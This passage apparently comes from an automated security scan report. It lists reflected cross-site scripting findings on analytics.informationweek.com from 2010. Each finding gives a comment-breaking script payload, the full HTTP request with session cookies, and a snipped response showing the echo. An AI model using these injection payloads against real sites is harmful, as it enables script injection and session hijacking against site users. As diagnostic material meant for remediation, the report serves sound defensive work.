<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2Fmenu%2F76530f--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0f554b3848a%2FEnterprise-software%2FEnterprise-software.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/76530f--><script>alert(1)</script>0f554b3848a/Enterprise-software/Enterprise-software.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 394db--><script>alert(1)</script>ad5fb2f5388 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/7/Enterprise-software394db--><script>alert(1)</script>ad5fb2f5388/Enterprise-software.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:38 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ise-software394db--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ead5fb2f5388%2FEnterprise-software.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/7/Enterprise-software394db--><script>alert(1)</script>ad5fb2f5388/Enterprise-software.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 52ffa--><script>alert(1)</script>da46735b536 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/7/Enterprise-software/Enterprise-software.html52ffa--><script>alert(1)</script>da46735b536 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:47 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... -software.html52ffa--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eda46735b536&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/7/Enterprise-software/Enterprise-software.html52ffa--><script>alert(1)</script>da46735b536"> ...[SNIP]...
3.135. http://analytics.informationweek.com/menu/7/Enterprise-software/Enterprise-software.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5f524--><script>alert(1)</script>fd55c962d4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/7/Enterprise-software/Enterprise-software.html?5f524--><script>alert(1)</script>fd55c962d4f=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... e.html%3F5f524--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efd55c962d4f%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/7/Enterprise-software/Enterprise-software.html?5f524--><script>alert(1)</script>fd55c962d4f=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload f5a72--><script>alert(1)</script>d5ede8dd7a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menuf5a72--><script>alert(1)</script>d5ede8dd7a5/8/Green-computing/Green-computing.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:44:59 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:00 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nweek.com%2Fmenuf5a72--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed5ede8dd7a5%2F8%2FGreen-computing%2FGreen-computing.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menuf5a72--><script>alert(1)</script>d5ede8dd7a5/8/Green-computing/Green-computing.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 8a77b--><script>alert(1)</script>14b87dd0fa5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/88a77b--><script>alert(1)</script>14b87dd0fa5/Green-computing/Green-computing.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:12 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... eek.com%2Fmenu%2F88a77b--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E14b87dd0fa5%2FGreen-computing%2FGreen-computing.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/88a77b--><script>alert(1)</script>14b87dd0fa5/Green-computing/Green-computing.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload afe6f--><script>alert(1)</script>4134aba7b4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/8/Green-computingafe6f--><script>alert(1)</script>4134aba7b4e/Green-computing.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:21 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... F8%2FGreen-computingafe6f--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4134aba7b4e%2FGreen-computing.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/8/Green-computingafe6f--><script>alert(1)</script>4134aba7b4e/Green-computing.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload a1f26--><script>alert(1)</script>08e46325f45 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/8/Green-computing/Green-computing.htmla1f26--><script>alert(1)</script>08e46325f45 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:30 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2FGreen-computing.htmla1f26--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E08e46325f45&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/8/Green-computing/Green-computing.htmla1f26--><script>alert(1)</script>08e46325f45"> ...[SNIP]...
3.140. http://analytics.informationweek.com/menu/8/Green-computing/Green-computing.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /menu/8/Green-computing/Green-computing.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9c1ee--><script>alert(1)</script>398d76ee13b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/8/Green-computing/Green-computing.html?9c1ee--><script>alert(1)</script>398d76ee13b=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... computing.html%3F9c1ee--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E398d76ee13b%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/8/Green-computing/Green-computing.html?9c1ee--><script>alert(1)</script>398d76ee13b=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload d25e7--><script>alert(1)</script>4b9134bfae2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menud25e7--><script>alert(1)</script>4b9134bfae2/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:33 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46059
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 9134bfae2%2F81%2FBusiness-intelligence-and-information-management%2FBusiness-intelligence-and-information-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menud25e7--><script>alert(1)</script>4b9134bfae2/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload b967f--><script>alert(1)</script>838a3736468 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/81b967f--><script>alert(1)</script>838a3736468/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:53 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46059
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 838a3736468%2FBusiness-intelligence-and-information-management%2FBusiness-intelligence-and-information-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/81b967f--><script>alert(1)</script>838a3736468/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload e195e--><script>alert(1)</script>ad9c07df00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/81/Business-intelligence-and-information-managemente195e--><script>alert(1)</script>ad9c07df00/Business-intelligence-and-information-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:42:17 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:42:17 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3Ead9c07df00%2FBusiness-intelligence-and-information-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/81/Business-intelligence-and-information-managemente195e--><script>alert(1)</script>ad9c07df00/Business-intelligence-and-information-management.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 910c8--><script>alert(1)</script>a52c545ddcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html910c8--><script>alert(1)</script>a52c545ddcc HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:42:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:42:30 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46059
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... t%3Ea52c545ddcc&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html910c8--><script>alert(1)</script>a52c545ddcc"> ...[SNIP]...
3.145. http://analytics.informationweek.com/menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 23c1b--><script>alert(1)</script>b70805851bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html?23c1b--><script>alert(1)</script>b70805851bd=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 70805851bd%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html?23c1b--><script>alert(1)</script>b70805851bd=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ade54--><script>alert(1)</script>2eaa6cbd539 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menuade54--><script>alert(1)</script>2eaa6cbd539/83/It-business-strategy/It-business-strategy.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:05 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45947
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Fmenuade54--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2eaa6cbd539%2F83%2FIt-business-strategy%2FIt-business-strategy.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menuade54--><script>alert(1)</script>2eaa6cbd539/83/It-business-strategy/It-business-strategy.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload ef59f--><script>alert(1)</script>55ce15d0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
